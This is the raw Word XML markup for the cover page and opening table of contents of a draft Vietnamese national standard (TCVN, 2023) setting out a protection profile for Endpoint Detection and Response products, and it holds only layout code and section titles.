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14:paraId="5DA73177" w14:textId="6F9B1AAB" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00BA222D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5AAE3BF1" wp14:editId="5E24ADAD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>70485</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>360680</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="847090" cy="0"/>
                <wp:effectExtent l="19050" t="13970" r="10160" b="14605"/>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0CC4D2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8.4pt" to="72.2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" strokeweight=".53mm">
                <v:stroke joinstyle="miter" endcap="square"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="693E627E" wp14:editId="75BAB7CB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>70485</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>17145</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="847090" cy="0"/>
                <wp:effectExtent l="19050" t="13335" r="10160" b="1524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CCEBE3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35pt" to="7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" strokeweight=".53mm">
                <v:stroke joinstyle="miter" endcap="square"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00894438" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251654144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C001839" wp14:editId="42E2FBC4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-744855</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>480695</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7653655" cy="365760"/>
                <wp:effectExtent l="3810" t="635" r="635" b="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3655" cy="365760"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFCC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C472D77" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:-58.65pt;margin-top:37.85pt;width:602.65pt;height:28.8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" fillcolor="#fc0" stroked="f" strokecolor="#3465a4">
                <v:stroke joinstyle="round"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00894438" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114935" distR="114935" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="195562BA" wp14:editId="678A85D1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4914900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-457200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1605915" cy="384810"/>
                <wp:effectExtent l="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1A6CB" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
                            <w:pPr>
                              <w:pStyle w:val="Header"/>
                              <w:jc w:val="right"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="109855" tIns="64135" rIns="109855" bIns="6413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95562BA" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 6" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:387pt;margin-top:-36pt;width:126.45pt;height:30.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" stroked="f">
                <v:textbox inset="8.65pt,5.05pt,8.65pt,5.05pt">
                  <w:txbxContent>
                    <w:p w14:paraId="2701A6CB" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
                      <w:pPr>
                        <w:pStyle w:val="Header"/>
                        <w:jc w:val="right"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00894438" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="48"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114935" distR="114935" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BB94312" wp14:editId="483C7E90">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-322580</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-523240</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2386330" cy="454025"/>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7DB93" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
                            <w:pPr>
                              <w:pStyle w:val="Header"/>
                              <w:jc w:val="right"/>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="109855" tIns="64135" rIns="109855" bIns="6413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BB94312" id="Text Box 7" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-25.4pt;margin-top:-41.2pt;width:187.9pt;height:35.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" stroked="f">
                <v:textbox inset="8.65pt,5.05pt,8.65pt,5.05pt">
                  <w:txbxContent>
                    <w:p w14:paraId="1737DB93" w14:textId="77777777" w:rsidR="00204C5F" w:rsidRDefault="00204C5F">
                      <w:pPr>
                        <w:pStyle w:val="Header"/>
                        <w:jc w:val="right"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="loai_1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidR="00B1283F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>TCVN</w:t>
      </w:r>
      <w:r w:rsidR="00B1283F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="00B1283F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>T I Ê U  C H U Ẩ N  Q U Ố C  G I A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72218D60" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41"/>
    <w:p w14:paraId="0C399257" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AFCDD4" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E77F6A9" w14:textId="7D22FC81" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">TCVN </w:t>
      </w:r>
      <w:r w:rsidR="00F303BE" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>xxxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>:20</w:t>
      </w:r>
      <w:r w:rsidR="005E7205" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F303BE" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E9785" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00006AB1" w:rsidP="00BD2F41">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Xuất bản lần 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B47B942" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699B0133" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A89F4C4" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197FEAFB" w14:textId="01EB791B" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">CÔNG NGHỆ THÔNG TIN </w:t>
      </w:r>
      <w:r w:rsidR="009A7637" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve"> CÁC KỸ THUẬT AN TOÀN </w:t>
      </w:r>
      <w:r w:rsidR="009A7637" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00603B6E" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t xml:space="preserve">HỒ SƠ BẢO VỆ CHO </w:t>
      </w:r>
      <w:r w:rsidR="00F303BE" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:t>SẢN PHẨM PHÁT HIỆN VÀ PHẢN HỒI ĐIỂM CUỐI (EDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB090C" w14:textId="302424BB" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Information technology </w:t>
      </w:r>
      <w:r w:rsidR="009A7637" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security techniques </w:t>
      </w:r>
      <w:r w:rsidR="00801BD2" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Protection profile for </w:t>
      </w:r>
      <w:r w:rsidR="00801BD2" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                              </w:t>
      </w:r>
      <w:r w:rsidR="00F303BE" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Endpoint Detection and Response (EDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4226D46C" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66AFFC84" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08773729" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="36"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="608BE640" w14:textId="77777777" w:rsidR="002E5D91" w:rsidRPr="00204C5F" w:rsidRDefault="002E5D91" w:rsidP="00BD2F41">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299F0EA3" w14:textId="77777777" w:rsidR="00801BD2" w:rsidRPr="00204C5F" w:rsidRDefault="00801BD2" w:rsidP="00BD2F41">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="720D1497" w14:textId="77777777" w:rsidR="006D5C6B" w:rsidRPr="00204C5F" w:rsidRDefault="006D5C6B" w:rsidP="00BD2F41">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADBE1E8" w14:textId="78AD477A" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00894438" w:rsidP="00BD2F41">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:sectPr w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidSect="0069298D">
          <w:headerReference w:type="even" r:id="rId8"/>
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="even" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="first" r:id="rId12"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="680" w:bottom="1134" w:left="1134" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D4F1103" wp14:editId="53D039C5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-1066165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>463550</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7936230" cy="1952625"/>
                <wp:effectExtent l="0" t="0" r="1270" b="635"/>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6230" cy="1952625"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFCC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EECB9C5" id="Rectangle 9" o:spid="_x0000_s1026" style="position:absolute;margin-left:-83.95pt;margin-top:36.5pt;width:624.9pt;height:15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" fillcolor="#fc0" stroked="f" strokecolor="#3465a4">
                <v:stroke joinstyle="round"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B1283F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HÀ NỘI </w:t>
      </w:r>
      <w:r w:rsidR="009A7637" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00B1283F" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
      <w:r w:rsidR="00F303BE" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607687A0" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:sectPr w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidSect="0069298D">
          <w:headerReference w:type="even" r:id="rId13"/>
          <w:headerReference w:type="default" r:id="rId14"/>
          <w:footerReference w:type="even" r:id="rId15"/>
          <w:footerReference w:type="default" r:id="rId16"/>
          <w:headerReference w:type="first" r:id="rId17"/>
          <w:footerReference w:type="first" r:id="rId18"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="680" w:bottom="1134" w:left="1134" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E3DF930" w14:textId="77777777" w:rsidR="00B1283F" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F" w:rsidP="00BD2F41">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mục lục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58493D71" w14:textId="3FC11D30" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="00B1283F">
      <w:pPr>
        <w:pStyle w:val="TOC20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:instrText xml:space="preserve"> TOC \o "1-4" \h \z \u </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc137476352" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1 Phạm vi áp dụng</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476352 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CC70D78" w14:textId="006235EB" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476353" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2 Tài liệu viện dẫn</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476353 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B5C59E8" w14:textId="3F6025F5" w:rsidR="005873FB" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD">
      <w:pPr>
        <w:pStyle w:val="TOC20"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc137476354" w:history="1">
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3 Thuật ngữ và định nghĩa</w:t>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc137476354 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="005873FB" w:rsidRPr="00204C5F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
